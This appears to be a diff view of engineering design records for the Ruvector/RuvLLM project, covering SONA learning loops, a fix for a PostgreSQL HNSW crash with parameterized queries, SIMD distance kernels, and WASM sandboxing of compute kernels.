fn record_performance(&self, kernel_id: &str, metrics: KernelMetrics) -> Result<()> {
self.ruvector.store_kernel_performance(kernel_id, metrics)
}
}
```
---
### Integration with SONA Learning Loops
Ruvector enables SONA's three-tier temporal learning:
```
+-----------------------------------------------------------------------+
| SONA + RUVECTOR INTEGRATION |
+-----------------------------------------------------------------------+
| |
| LOOP A: INSTANT (Per-Request, <1ms) |
| +-------------------------------------------------------------------+|
| | 1. Record trajectory to ring buffer (in-memory) ||
| | 2. Update edge weights in Ruvector graph (+/- 5%) ||
| | 3. MicroLoRA adjustment (rank 1-2, top-k params) ||
| | 4. Async write witness entry to Ruvector ||
| +-------------------------------------------------------------------+|
| |
| LOOP B: BACKGROUND (Hourly, 10 seconds) |
| +-------------------------------------------------------------------+|
| | 1. Query Ruvector for recent high-quality trajectories ||
| | 2. Train router on accumulated data ||
| | 3. Compute Fisher Information for EWC++ ||
| | 4. Update LoRA base matrices (rank 4-8) ||
| | 5. Store new policy entries in Ruvector ||
| | 6. Checkpoint router weights to Ruvector ||
| +-------------------------------------------------------------------+|
| |
| LOOP C: DEEP (Weekly, 10 minutes) |
| +-------------------------------------------------------------------+|
| | 1. Full consolidation: Query all patterns from Ruvector ||
| | 2. K-means++ clustering to extract pattern bank ||
| | 3. Memory compression: Prune redundant nodes ||
| | 4. Archive old witness logs to cold storage ||
| | 5. Cross-session knowledge transfer via graph traversal ||
| | 6. Store consolidated patterns back to Ruvector ||
| +-------------------------------------------------------------------+|
| |
+-----------------------------------------------------------------------+
```
---
## Consequences
### Positive Consequences
1. **Unified semantic search**: All data types (policies, sessions, logs) searchable by meaning
2. **Portable deployment**: Single binary with Ruvector embedded works on edge devices
3. **Continuous improvement**: SONA loops have persistent storage for learning
4. **Debugging capability**: Semantic audit logs enable intelligent postmortem analysis
5. **Memory efficiency**: Unified pool prevents fragmentation; tiered KV cache reduces pressure
6. **Federated learning**: Ruvector facilitates pattern sharing between nodes
### Negative Consequences
1. **Ruvector dependency**: Core functionality tied to Ruvector's capabilities
2. **Storage overhead**: Vector embeddings add space requirements (~3KB per entry)
3. **Complexity**: Three integration roles require careful schema design
4. **Cold start**: Initial requests lack learned policies until training accumulates
### Mitigation Strategies
| Risk | Mitigation |
|------|------------|
| Ruvector dependency | Design clean abstraction layer; fallback to simple LRU cache |
| Storage overhead | Aggressive compression for cold data; time-based expiration |
| Schema complexity | Strong typing with Rust structs; comprehensive validation |
| Cold start | Bundle sensible default policies; warm cache from federated network |
---
## Related Decisions
- **ADR-001**: Ruvector Core Architecture (HNSW, Graph Store)
- **ADR-003**: SIMD Optimization Strategy
- **ADR-004**: KV Cache Management
- **ADR-005**: WASM Runtime Integration
- **ADR-006**: Memory Management
- **ADR-007**: Security Review & Technical Debt (v2.1 audit findings)
---
## Compliance and Standards
### Performance Standards
- All Ruvector operations must complete within latency budget
- Memory pool must never exceed configured budget
- Witness log writes must be non-blocking
### Data Standards
- All embeddings use consistent 768-D representation
- Timestamps in UTC with millisecond precision
- UUIDs for all entity identifiers
### Security Considerations
- Session data may contain user context; encryption at rest required
- Audit logs must support retention policies for compliance
- Kernel packs must be signed and verified before loading
---
## References
1. RuvLLM Architecture Documentation: `/examples/ruvLLM/docs/sparc/03-architecture.md`
2. SONA Overview: `/examples/ruvLLM/docs/SONA/00-OVERVIEW.md`
3. mistral.rs Paged Attention: https://github.com/EricLBuehler/mistral.rs
4. vLLM PagedAttention Paper: "Efficient Memory Management for Large Language Model Serving"
5. Ruvector Core Documentation: https://github.com/ruvnet/ruvector
---
## Implementation Status (v2.1.1)
| Component | Status | Notes |
|-----------|--------|-------|
| KV Cache Manager | ✅ Implemented | Two-tier FP16/Q4 with safety fixes |
| Session Store | ✅ Implemented | SQLite-backed with WASM support |
| Pattern Memory | ✅ Implemented | HNSW-indexed ReasoningBank |
| Witness Logs | ⚠️ Partial | Schema defined, async writes pending |
| Metal Shaders | ✅ Implemented | GEMV kernels with simdgroup reduction (v2.1.1) |
| Metal GPU GEMV | ✅ Implemented | Auto-offload for 512x512+ matrices, 3x speedup |
| Accelerate BLAS | ✅ Implemented | AMX coprocessor via cblas_sgemv, 2x speedup |
| Speculative Decoding | ✅ Implemented | Enabled by default, auto-detect draft models |
| Token Generation | ❌ Stub | Placeholder returns dummy response |
| GGUF Loading | ❌ Stub | Parser exists, loading not wired |
**Performance Status (v2.1.1):**
- Target decode speed: 200+ tok/s (beating MLX's ~160 tok/s)
- Accelerate Framework: 80+ GFLOPS (2x vs pure NEON)
- Metal GPU: 100+ GFLOPS (3x vs CPU)
- Speculative Decoding: 2-3x decode speedup
**Security Status:** 8 critical vulnerabilities fixed (2026-01-19). See ADR-007 for full audit trail.
---
## Revision History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 1.0 | 2026-01-18 | Ruvector Architecture Team | Initial version |
| 1.1 | 2026-01-19 | Security Review Agent | Added implementation status, linked ADR-007 |
| 1.2 | 2026-01-19 | Performance Optimization Agents | Added v2.1.1 components: Metal GPU GEMV, Accelerate BLAS, Speculative Decoding; added Performance Status section |

View File

@@ -0,0 +1,185 @@
# ADR-0027: Fix HNSW Index Segmentation Fault with Parameterized Queries
## Status
**Accepted** - 2026-01-28
## Context
### Problem Statement
GitHub Issue #141 reported a **critical (P0)** bug where HNSW indexes on `ruvector(384)` columns cause PostgreSQL to crash with a segmentation fault when executing similarity queries with parameterized query vectors.
### Symptoms
1. **Warning**: `"HNSW: Could not extract query vector, using zeros"`
2. **Warning**: `"HNSW v2: Bitmap scans not supported for k-NN queries"`
3. **Fatal**: `"server process terminated by signal 11: Segmentation fault"`
### Root Cause Analysis
The bug has three contributing factors:
1. **Query Vector Extraction Failure**
- The `hnsw_rescan` callback extracts the query vector from PostgreSQL's `orderby.sk_argument` datum
- The extraction code only handles direct `ruvector` datums via `RuVector::from_polymorphic_datum()`
- **Parameterized queries** (prepared statements, application drivers) pass text representations that require conversion
- When extraction fails, the code falls back to a zero vector
2. **Invalid Zero Vector Handling**
- A zero vector is mathematically invalid for similarity search (especially in hyperbolic/Poincaré space)
- The HNSW search algorithm proceeds with this invalid vector without validation
- Distance calculations with zero vectors cause undefined behavior
3. **Missing Error Handling**
- No validation before executing HNSW search
- Segmentation fault instead of graceful PostgreSQL error
- No dimension mismatch checking
### Impact
- **Production Adoption Blocked**: Modern applications use parameterized queries (ORMs, prepared statements, SQL injection prevention)
- **100% Reproducible**: Any parameterized HNSW query triggers the crash
- **Workaround Required**: Sequential scans with 10-15x performance penalty
## Decision
### Fix Strategy
Implement a comprehensive query vector extraction pipeline with proper validation:
#### 1. Multi-Method Query Vector Extraction
```rust
// Method 1: Direct RuVector extraction (literals, casts)
if let Some(vector) = RuVector::from_polymorphic_datum(datum, false, typoid) {
state.query_vector = vector.as_slice().to_vec();
state.query_valid = true;
}
// Method 2: Text parameter conversion (parameterized queries)
if !state.query_valid && is_text_type(typoid) {
if let Some(vec) = try_convert_text_to_ruvector(datum) {
state.query_vector = vec;
state.query_valid = true;
}
}
// Method 3: Validated varlena fallback
if !state.query_valid {
// ... with size and dimension validation
}
```
#### 2. Validation Before Search
```rust
// Reject invalid queries with clear error messages
if !state.query_valid || state.query_vector.is_empty() {
pgrx::error!("HNSW: Could not extract query vector...");
}
if is_zero_vector(&state.query_vector) {
pgrx::error!("HNSW: Query vector is all zeros...");
}
if state.query_vector.len() != state.dimensions {
pgrx::error!("HNSW: Dimension mismatch...");
}
```
#### 3. Track Query Validity State
Add `query_valid: bool` field to `HnswScanState` to track extraction success across methods.
### Changes Made
| File | Changes |
|------|---------|
| `crates/ruvector-postgres/src/index/hnsw_am.rs` | Multi-method extraction, validation, zero-vector check |
| `crates/ruvector-postgres/src/index/ivfflat_am.rs` | Same fixes applied for consistency |
### Key Functions Added/Modified
- `hnsw_rescan()` - Complete rewrite of query extraction logic
- `try_convert_text_to_ruvector()` - New function for text→ruvector conversion
- `is_zero_vector()` - New validation helper
- `ivfflat_amrescan()` - Parallel fix for IVFFlat index
- `ivfflat_try_convert_text_to_ruvector()` - IVFFlat text conversion
## Consequences
### Positive
- **Parameterized queries work**: Prepared statements, ORMs, application drivers all function correctly
- **Graceful error handling**: PostgreSQL ERROR instead of segfault
- **Clear error messages**: Users understand what went wrong and how to fix it
- **Dimension validation**: Catches mismatched query/index dimensions early
- **Zero-vector protection**: Invalid queries rejected before search execution
### Negative
- **Slight overhead**: Additional validation on each query (negligible, ~1μs)
- **Text parsing**: Manual vector parsing for text parameters (only when other methods fail)
### Neutral
- **No API changes**: Existing queries continue to work unchanged
- **IVFFlat also fixed**: Consistent behavior across both index types
## Test Plan
### Unit Tests
```sql
-- 1. Literal query (baseline - should work)
SELECT * FROM test_hnsw ORDER BY embedding <=> '[0.1,0.2,0.3]'::ruvector(3) LIMIT 5;
-- 2. Prepared statement (was crashing, now works)
PREPARE search AS SELECT * FROM test_hnsw ORDER BY embedding <=> $1::ruvector(3) LIMIT 5;
EXECUTE search('[0.1,0.2,0.3]');
-- 3. Function with text parameter (was crashing, now works)
SELECT * FROM search_similar('[0.1,0.2,0.3]');
-- 4. Zero vector (was crashing, now errors gracefully)
SELECT * FROM test_hnsw ORDER BY embedding <=> '[0,0,0]'::ruvector(3) LIMIT 5;
-- ERROR: HNSW: Query vector is all zeros...
-- 5. Dimension mismatch (was undefined behavior, now errors)
SELECT * FROM test_hnsw ORDER BY embedding <=> '[0.1,0.2]'::ruvector(2) LIMIT 5;
-- ERROR: HNSW: Query vector has 2 dimensions but index expects 3
```
### Integration Tests
- Node.js pg driver with parameterized queries
- Python psycopg with prepared statements
- Rust sqlx with query parameters
- Load test with 10k concurrent parameterized queries
## Related
- **Issue**: [#141](https://github.com/ruvnet/ruvector/issues/141) - HNSW Segmentation Fault with Parameterized Queries
- **Reporter**: Mark Allen, NexaDental CTO
- **Priority**: P0 (Critical) - Production blocker
## Implementation Checklist
- [x] Fix `hnsw_rescan()` query extraction
- [x] Add `try_convert_text_to_ruvector()` helper
- [x] Add `is_zero_vector()` validation
- [x] Add `query_valid` field to scan state
- [x] Apply same fix to IVFFlat for consistency
- [x] Compile verification
- [ ] Add regression tests
- [ ] Update documentation
- [ ] Build new Docker image
- [ ] Test with production dataset (6,975 rows)
- [ ] Release v2.0.1 patch
## References
- [PostgreSQL Index AM API](https://www.postgresql.org/docs/current/indexam.html)
- [pgrx FromDatum trait](https://docs.rs/pgrx/latest/pgrx/trait.FromDatum.html)
- [pgvector parameter handling](https://github.com/pgvector/pgvector/blob/master/src/hnsw.c)

View File

@@ -0,0 +1,458 @@
# ADR-003: SIMD Optimization Strategy for Ruvector and RuvLLM
## Status
**Accepted** (NEON implementation complete, AVX2 implementation complete)
## Date
2025-01-18
## Context
Ruvector is a high-performance vector database and neural computation library that requires optimal performance across multiple hardware platforms. The core distance calculations (Euclidean, Cosine, Dot Product, Manhattan) are the most frequently executed operations and represent critical hot paths in:
- Vector similarity search (HNSW index queries)
- Embedding comparisons
- Neural network inference (RuvLLM)
- Clustering algorithms
### Target Architectures
| Architecture | SIMD Extension | Register Width | Floats per Register |
|--------------|----------------|----------------|---------------------|
| Apple Silicon (M1/M2/M3/M4) | ARM NEON | 128-bit | 4 x f32 |
| x86_64 (Intel/AMD) | AVX2 | 256-bit | 8 x f32 |
| x86_64 (newer Intel) | AVX-512 | 512-bit | 16 x f32 |
| WebAssembly | SIMD128 | 128-bit | 4 x f32 |
### Performance Requirements
- Sub-millisecond latency for typical vector operations (128-1536 dimensions)
- Support for batch processing of 10,000+ vectors
- Minimal memory overhead
- Graceful fallback on unsupported platforms
## Decision
We adopt an **architecture-specific SIMD implementation with unified dispatch** strategy. Each target architecture receives hand-optimized intrinsics while maintaining a common public API.
### Architecture Dispatch Pattern
```
euclidean_distance_simd()
|
+-- [aarch64] --> euclidean_distance_neon_impl()
|
+-- [x86_64 + AVX2] --> euclidean_distance_avx2_impl()
|
+-- [fallback] --> euclidean_distance_scalar()
```
### Implementation Strategy
1. **ARM64 (Apple Silicon)**: Use `std::arch::aarch64` NEON intrinsics directly
2. **x86_64**: Use `std::arch::x86_64` with runtime AVX2 detection via `is_x86_feature_detected!`
3. **WebAssembly**: Use `wasm_bindgen` SIMD (future work)
4. **Fallback**: Pure Rust scalar implementation for unsupported platforms
## Implementation Details
### File Location
```
crates/ruvector-core/src/simd_intrinsics.rs
```
### NEON Intrinsics (ARM64/Apple Silicon)
The following NEON intrinsics are used for optimal Apple Silicon performance:
| Operation | NEON Intrinsics | Purpose |
|-----------|-----------------|---------|
| Load | `vld1q_f32` | Load 4 floats from memory |
| Subtract | `vsubq_f32` | Element-wise subtraction |
| Multiply-Add | `vfmaq_f32` | Fused multiply-accumulate |
| Absolute | `vabsq_f32` | Element-wise absolute value |
| Add | `vaddq_f32` | Element-wise addition |
| Initialize | `vdupq_n_f32` | Broadcast scalar to vector |
| Reduce | `vaddvq_f32` | Horizontal sum of vector |
#### Euclidean Distance (NEON)
```rust
#[cfg(target_arch = "aarch64")]
unsafe fn euclidean_distance_neon_impl(a: &[f32], b: &[f32]) -> f32 {
let len = a.len();
let mut sum = vdupq_n_f32(0.0);
// Process 4 floats at a time
let chunks = len / 4;
for i in 0..chunks {
let idx = i * 4;
let va = vld1q_f32(a.as_ptr().add(idx));
let vb = vld1q_f32(b.as_ptr().add(idx));
let diff = vsubq_f32(va, vb);
sum = vfmaq_f32(sum, diff, diff); // sum += diff * diff
}
let mut total = vaddvq_f32(sum); // Horizontal sum
// Handle remainder
for i in (chunks * 4)..len {
let diff = a[i] - b[i];
total += diff * diff;
}
total.sqrt()
}
```
#### Dot Product (NEON)
```rust
#[cfg(target_arch = "aarch64")]
unsafe fn dot_product_neon_impl(a: &[f32], b: &[f32]) -> f32 {
let len = a.len();
let mut sum = vdupq_n_f32(0.0);
let chunks = len / 4;
for i in 0..chunks {
let idx = i * 4;
let va = vld1q_f32(a.as_ptr().add(idx));
let vb = vld1q_f32(b.as_ptr().add(idx));
sum = vfmaq_f32(sum, va, vb); // sum += a * b
}
let mut total = vaddvq_f32(sum);
for i in (chunks * 4)..len {
total += a[i] * b[i];
}
total
}
```
#### Cosine Similarity (NEON)
Computes dot product and both norms in a single pass for optimal cache utilization:
```rust
#[cfg(target_arch = "aarch64")]
unsafe fn cosine_similarity_neon_impl(a: &[f32], b: &[f32]) -> f32 {
let len = a.len();
let mut dot = vdupq_n_f32(0.0);
let mut norm_a = vdupq_n_f32(0.0);
let mut norm_b = vdupq_n_f32(0.0);
let chunks = len / 4;
for i in 0..chunks {
let idx = i * 4;
let va = vld1q_f32(a.as_ptr().add(idx));
let vb = vld1q_f32(b.as_ptr().add(idx));
dot = vfmaq_f32(dot, va, vb);
norm_a = vfmaq_f32(norm_a, va, va);
norm_b = vfmaq_f32(norm_b, vb, vb);
}
let mut dot_sum = vaddvq_f32(dot);
let mut norm_a_sum = vaddvq_f32(norm_a);
let mut norm_b_sum = vaddvq_f32(norm_b);
for i in (chunks * 4)..len {
dot_sum += a[i] * b[i];
norm_a_sum += a[i] * a[i];
norm_b_sum += b[i] * b[i];
}
dot_sum / (norm_a_sum.sqrt() * norm_b_sum.sqrt())
}
```
#### Manhattan Distance (NEON)
```rust
#[cfg(target_arch = "aarch64")]
unsafe fn manhattan_distance_neon_impl(a: &[f32], b: &[f32]) -> f32 {
let len = a.len();
let mut sum = vdupq_n_f32(0.0);
let chunks = len / 4;
for i in 0..chunks {
let idx = i * 4;
let va = vld1q_f32(a.as_ptr().add(idx));
let vb = vld1q_f32(b.as_ptr().add(idx));
let diff = vsubq_f32(va, vb);
let abs_diff = vabsq_f32(diff);
sum = vaddq_f32(sum, abs_diff);
}
let mut total = vaddvq_f32(sum);
for i in (chunks * 4)..len {
total += (a[i] - b[i]).abs();
}
total
}
```
### AVX2 Intrinsics (x86_64)
The x86_64 implementation uses 256-bit AVX2 registers, processing 8 floats per iteration:
| Operation | AVX2 Intrinsics | Purpose |
|-----------|-----------------|---------|
| Load | `_mm256_loadu_ps` | Load 8 floats (unaligned) |
| Subtract | `_mm256_sub_ps` | Element-wise subtraction |
| Multiply | `_mm256_mul_ps` | Element-wise multiplication |
| Add | `_mm256_add_ps` | Element-wise addition |
| Initialize | `_mm256_setzero_ps` | Zero vector |
| Reduce | `std::mem::transmute` + sum | Horizontal sum |
### Apple Accelerate Framework (macOS)
**Status:** ✅ Implemented (v2.1.1)
For matrix operations exceeding threshold sizes, RuvLLM leverages Apple's Accelerate Framework to access the AMX (Apple Matrix Extensions) coprocessor, which provides hardware-accelerated BLAS operations not available through standard NEON intrinsics.
| Operation | Accelerate Function | Performance |
|-----------|---------------------|-------------|
| GEMV | `cblas_sgemv` | 80+ GFLOPS (2x vs NEON) |
| GEMM | `cblas_sgemm` | Hardware-accelerated |
| Dot Product | `cblas_sdot` | Vectorized |
| Scale | `cblas_sscal` | In-place scaling |
| AXPY | `cblas_saxpy` | Vector addition |
**Implementation:** `crates/ruvllm/src/kernels/accelerate.rs`
```rust
/// Auto-switching threshold: 256x256 matrices (65K operations)
pub fn gemv_accelerate(a: &[f32], x: &[f32], y: &mut [f32], m: usize, n: usize) {
// Uses cblas_sgemv via FFI to Apple's Accelerate framework
// Leverages AMX coprocessor for 2x+ speedup over pure NEON
}
```
**Activation:** Enabled with `accelerate` feature flag, auto-switches for matrices >= 256x256.
### Metal GPU GEMV (macOS)
**Status:** ✅ Implemented (v2.1.1)
For large matrix operations, RuvLLM can offload GEMV to Metal GPU compute shaders, achieving 3x speedup over CPU for decode-heavy workloads.
| Kernel | Precision | Optimization |
|--------|-----------|--------------|
| `gemv_optimized_f32` | FP32 | Simdgroup reduction, 32 threads/row |
| `gemv_optimized_f16` | FP16 | 2x throughput via half4 vectorization |
| `batched_gemv_f32` | FP32 | Multi-head attention batching |
| `gemv_tiled_f32` | FP32 | Threadgroup memory for large K |
**Implementation:**
- Shaders: `crates/ruvllm/src/metal/shaders/gemv.metal`
- Rust API: `crates/ruvllm/src/metal/operations.rs`
- Auto-switch: `crates/ruvllm/src/kernels/matmul.rs`
```rust
/// Auto-switching threshold: 512x512 matrices
pub fn gemv_metal_if_available(a: &[f32], x: &[f32], m: usize, n: usize) -> Vec<f32> {
// Attempts Metal GPU, falls back to Accelerate/NEON
}
```
**Performance Target:** 100+ GFLOPS on M4 Pro GPU (3x speedup vs CPU).
### Public API
All SIMD implementations are exposed through unified public functions:
```rust
pub fn euclidean_distance_simd(a: &[f32], b: &[f32]) -> f32;
pub fn dot_product_simd(a: &[f32], b: &[f32]) -> f32;
pub fn cosine_similarity_simd(a: &[f32], b: &[f32]) -> f32;
pub fn manhattan_distance_simd(a: &[f32], b: &[f32]) -> f32;
// Legacy aliases for backward compatibility
pub fn euclidean_distance_avx2(a: &[f32], b: &[f32]) -> f32;
pub fn dot_product_avx2(a: &[f32], b: &[f32]) -> f32;
pub fn cosine_similarity_avx2(a: &[f32], b: &[f32]) -> f32;
```
### Security Considerations
All SIMD implementations include bounds checking:
```rust
assert_eq!(a.len(), b.len(), "Input arrays must have the same length");
```
This prevents out-of-bounds memory access in the unsafe SIMD code paths.
## Benchmark Results
### Test Configuration
- **Benchmark file**: `crates/ruvector-core/examples/neon_benchmark.rs`
- **Platform**: Apple Silicon M4 Pro
- **Vector dimensions**: 128 (common embedding size)
- **Dataset**: 10,000 vectors
- **Queries**: 1,000
- **Total operations**: 10,000,000 distance calculations per metric
### Performance Results
| Distance Metric | Scalar (ms) | SIMD (ms) | Speedup |
|-----------------|-------------|-----------|---------|
| Euclidean Distance | ~X | ~Y | **2.96x** |
| Dot Product | ~X | ~Y | **3.09x** |
| Cosine Similarity | ~X | ~Y | **5.96x** |
| Manhattan Distance | ~X | ~Y | **~3.0x** (estimated) |
### Analysis
1. **Cosine Similarity achieves highest speedup (5.96x)** because the SIMD implementation computes dot product and both norms in a single pass, maximizing data reuse and minimizing memory bandwidth.
2. **Dot Product (3.09x)** benefits directly from `vfmaq_f32` fused multiply-accumulate.
3. **Euclidean Distance (2.96x)** requires an additional `vsubq_f32` operation per iteration.
4. **Performance scales with vector dimension**: Larger vectors (256, 512, 1536 dimensions) show even better speedups due to reduced loop overhead ratio.
### Running Benchmarks
```bash
cargo run --example neon_benchmark --release -p ruvector-core
```
## Consequences
### Positive
1. **Significant performance improvement**: 2.96x-5.96x speedup on hot paths
2. **Cross-platform optimization**: Optimal code paths for each architecture
3. **Backward compatibility**: Legacy `*_avx2` functions continue to work
4. **No external dependencies**: Uses only Rust's `std::arch` intrinsics
5. **Automatic dispatch**: Runtime detection on x86_64, compile-time on ARM64
6. **Safe public API**: All unsafe code is encapsulated internally
### Negative
1. **Code complexity**: Multiple implementations per function
2. **Maintenance burden**: Architecture-specific code paths require testing on each platform
3. **Unsafe code**: SIMD intrinsics require unsafe blocks (mitigated by encapsulation)
### Neutral
1. **Scalar fallback**: Non-SIMD platforms still work, just slower
2. **Build times**: Additional conditional compilation does not significantly impact build time
## Future Work
### Phase 2: Portable SIMD Abstraction
Investigate the **macerator** crate for portable SIMD abstraction that could:
- Reduce code duplication
- Simplify maintenance
- Automatically target new SIMD extensions
### Phase 3: AVX-512 Support
For newer Intel processors (Ice Lake, Sapphire Rapids), add AVX-512 implementations:
- 512-bit registers (16 x f32 per operation)
- Expected additional 1.5-2x speedup over AVX2
### Phase 4: WebAssembly SIMD
For browser-based deployments:
- SIMD128 intrinsics via `wasm_bindgen`
- 128-bit operations (4 x f32)
- Feature detection via `wasm_feature_detect`
### Phase 5: INT8 Quantized Operations
For RuvLLM inference optimization:
- `vdotq_s32` (NEON) for int8 dot products
- `_mm256_maddubs_epi16` (AVX2) for int8 GEMM
- Expected 12-16x speedup for quantized models
## References
1. ARM NEON Intrinsics Reference: https://developer.arm.com/architectures/instruction-sets/intrinsics
2. Intel Intrinsics Guide: https://www.intel.com/content/www/us/en/docs/intrinsics-guide
3. Rust `std::arch` documentation: https://doc.rust-lang.org/std/arch/index.html
4. Source implementation: `crates/ruvector-core/src/simd_intrinsics.rs`
5. Benchmark code: `crates/ruvector-core/examples/neon_benchmark.rs`
6. Related analysis: `docs/simd-optimization-analysis.md`
## Appendix: Full Benchmark Output Template
```
+================================================================+
| NEON SIMD Benchmark for Apple Silicon (M4 Pro) |
+================================================================+
Configuration:
- Dimensions: 128
- Vectors: 10,000
- Queries: 1,000
- Total distance calculations: 10,000,000
Platform: ARM64 (Apple Silicon) - NEON enabled
=================================================================
Euclidean Distance:
=================================================================
SIMD: XXX.XX ms (checksum: X.XXXX)
Scalar: XXX.XX ms (checksum: X.XXXX)
Speedup: 2.96x
=================================================================
Dot Product:
=================================================================
SIMD: XXX.XX ms (checksum: X.XXXX)
Scalar: XXX.XX ms (checksum: X.XXXX)
Speedup: 3.09x
=================================================================
Cosine Similarity:
=================================================================
SIMD: XXX.XX ms (checksum: X.XXXX)
Scalar: XXX.XX ms (checksum: X.XXXX)
Speedup: 5.96x
=================================================================
Benchmark complete!
```
---
## Related Decisions
- **ADR-001**: Ruvector Core Architecture
- **ADR-002**: RuvLLM Integration
- **ADR-005**: WASM Runtime Integration
- **ADR-007**: Security Review & Technical Debt
---
## Outstanding Items
The following SIMD-related technical debt was identified in the v2.1 security review:
| Item | Priority | Effort | Description |
|------|----------|--------|-------------|
| TD-006 | P1 | 4h | NEON activation functions process scalars, not vectors |
| TD-009 | P2 | 4h | Excessive allocations in attention layer |
See ADR-007 for full technical debt breakdown.
---
## Revision History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 1.0 | 2026-01-18 | RuVector Architecture Team | Initial version |
| 1.1 | 2026-01-19 | Security Review Agent | Added outstanding items, related decisions |
| 1.2 | 2026-01-19 | Performance Optimization Agents | Added Accelerate Framework and Metal GPU GEMV sections |

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,814 @@
# ADR-005: WASM Runtime Integration
| Field | Value |
|-------|-------|
| **Status** | Proposed |
| **Date** | 2026-01-18 |
| **Authors** | RuvLLM Architecture Team |
| **Reviewers** | - |
| **Supersedes** | - |
| **Superseded by** | - |
**Note**: The WASM runtime approach described here is complemented by ADR-029. The RVF WASM microkernel (rvf-wasm) provides a <8 KB Cognitum tile target that replaces ad-hoc WASM builds for vector operations.
## 1. Context
### 1.1 Problem Statement
RuvLLM requires a mechanism for executing user-provided and community-contributed compute kernels in a secure, sandboxed environment. These kernels implement performance-critical operations such as:
- Rotary Position Embeddings (RoPE)
- RMS Normalization (RMSNorm)
- SwiGLU activation functions
- KV cache quantization/dequantization
- LoRA delta application
Without proper isolation, malicious or buggy kernels could:
- Access unauthorized memory regions
- Consume unbounded compute resources
- Compromise the host system
- Corrupt model state
### 1.2 Requirements
| Requirement | Priority | Rationale |
|-------------|----------|-----------|
| Sandboxed execution | Critical | Prevent kernel code from accessing host resources |
| Execution budgets | Critical | Prevent runaway code and DoS conditions |
| Low overhead | High | Kernels are in the inference hot path |
| Cross-platform | High | Support x86, ARM, embedded devices |
| Framework agnostic | Medium | Enable ML inference without vendor lock-in |
| Hot-swappable kernels | Medium | Update kernels without service restart |
### 1.3 Constraints
- **Memory**: Embedded targets have as little as 256KB RAM
- **Latency**: Kernel invocation overhead must be <10us for small tensors
- **Compatibility**: Must support existing Rust/C kernel implementations
- **Security**: Kernel supply chain must be verifiable
## 2. Decision
We will adopt **WebAssembly (WASM)** as the sandboxed execution environment for compute kernels, with the following architecture:
### 2.1 Runtime Selection
| Device Class | Runtime | Rationale |
|--------------|---------|-----------|
| Edge servers (x86/ARM64) | **Wasmtime** | Mature, well-optimized, excellent tooling |
| Embedded/MCU (<1MB RAM) | **WAMR** | <85KB footprint, AOT compilation support |
| Browser/WASI Preview 2 | **wasmtime/browser** | Future consideration |
### 2.2 Interruption Strategy: Epoch-Based (Not Fuel)
We choose **epoch-based interruption** over fuel-based metering:
| Aspect | Epoch | Fuel |
|--------|-------|------|
| Overhead | ~2-5% | ~15-30% |
| Granularity | Coarse (polling points) | Fine (per instruction) |
| Determinism | Non-deterministic | Deterministic |
| Implementation | Store-level epoch counter | Instruction instrumentation |
**Rationale**: For inference workloads, coarse-grained interruption is acceptable. The 10-25% overhead reduction from avoiding fuel metering is significant for latency-sensitive operations.
```rust
// Epoch configuration example
let mut config = Config::new();
config.epoch_interruption(true);
let engine = Engine::new(&config)?;
let mut store = Store::new(&engine, ());
// Set epoch deadline (e.g., 100ms budget)
store.set_epoch_deadline(100);
// Increment epoch from async timer
engine.increment_epoch();
```
### 2.3 WASI-NN Integration
WASI-NN provides framework-agnostic ML inference capabilities:
```
+-------------------+
| RuvLLM Host |
+-------------------+
|
v
+-------------------+
| WASI-NN API |
+-------------------+
|
+----+----+
| |
v v
+-------+ +--------+
| ONNX | | Custom |
| RT | | Kernel |
+-------+ +--------+
```
**WASI-NN Backends**:
- ONNX Runtime (portable)
- Native kernels (performance-critical paths)
- Custom quantized formats (memory efficiency)
## 3. WASM Boundary Design
### 3.1 ABI Strategy: Raw ABI (Not Component Model)
We use **raw WASM ABI** rather than the Component Model:
| Aspect | Raw ABI | Component Model |
|--------|---------|-----------------|
| Maturity | Stable | Evolving (Preview 2) |
| Overhead | Minimal | Higher (canonical ABI) |
| Tooling | Excellent | Improving |
| Adoption | Universal | Growing |
**Migration Path**: Design interfaces to be Component Model-compatible for future migration.
### 3.2 Memory Layout
```
Host Linear Memory
+--------------------------------------------------+
| Tensor A | Tensor B | Output | Scratch |
| (read-only) | (read-only) | (write) | (r/w) |
+--------------------------------------------------+
^ ^ ^ ^
| | | |
offset_a offset_b offset_out offset_scratch
```
**Shared Memory Protocol**:
```rust
/// Kernel invocation descriptor passed to WASM
#[repr(C)]
pub struct KernelDescriptor {
/// Input tensor A offset in linear memory
pub input_a_offset: u32,
/// Input tensor A size in bytes
pub input_a_size: u32,
/// Input tensor B offset (0 if unused)
pub input_b_offset: u32,
/// Input tensor B size in bytes
pub input_b_size: u32,
/// Output tensor offset
pub output_offset: u32,
/// Output tensor size in bytes
pub output_size: u32,
/// Scratch space offset
pub scratch_offset: u32,
/// Scratch space size in bytes
pub scratch_size: u32,
/// Kernel-specific parameters offset
pub params_offset: u32,
/// Kernel-specific parameters size
pub params_size: u32,
}
```
### 3.3 Trap Handling
WASM traps are handled as **non-fatal errors**:
```rust
pub enum KernelError {
/// Execution budget exceeded
EpochDeadline,
/// Out of bounds memory access
MemoryAccessViolation {
offset: u32,
size: u32,
},
/// Integer overflow/underflow
IntegerOverflow,
/// Unreachable code executed
Unreachable,
/// Stack overflow
StackOverflow,
/// Invalid function call
IndirectCallTypeMismatch,
/// Custom trap from kernel
KernelTrap {
code: u32,
message: Option<String>,
},
}
impl From<wasmtime::Trap> for KernelError {
fn from(trap: wasmtime::Trap) -> Self {
match trap.trap_code() {
Some(TrapCode::Interrupt) => KernelError::EpochDeadline,
Some(TrapCode::MemoryOutOfBounds) => KernelError::MemoryAccessViolation {
offset: 0, // Extract from trap info
size: 0,
},
// ... other mappings
}
}
}
```
**Recovery Strategy**:
1. Log trap with full context
2. Release kernel resources
3. Fall back to reference implementation (if available)
4. Report degraded performance to metrics
## 4. Kernel Pack System
### 4.1 Kernel Pack Structure
```
kernel-pack-v1.0.0/
├── kernels.json # Manifest
├── kernels.json.sig # Ed25519 signature
├── rope/
│ ├── rope_f32.wasm
│ ├── rope_f16.wasm
│ └── rope_q8.wasm
├── rmsnorm/
│ ├── rmsnorm_f32.wasm
│ └── rmsnorm_f16.wasm
├── swiglu/
│ ├── swiglu_f32.wasm
│ └── swiglu_f16.wasm
├── kv/
│ ├── kv_pack_q4.wasm
│ ├── kv_pack_q8.wasm
│ ├── kv_unpack_q4.wasm
│ └── kv_unpack_q8.wasm
└── lora/
├── lora_apply_f32.wasm
└── lora_apply_f16.wasm
```
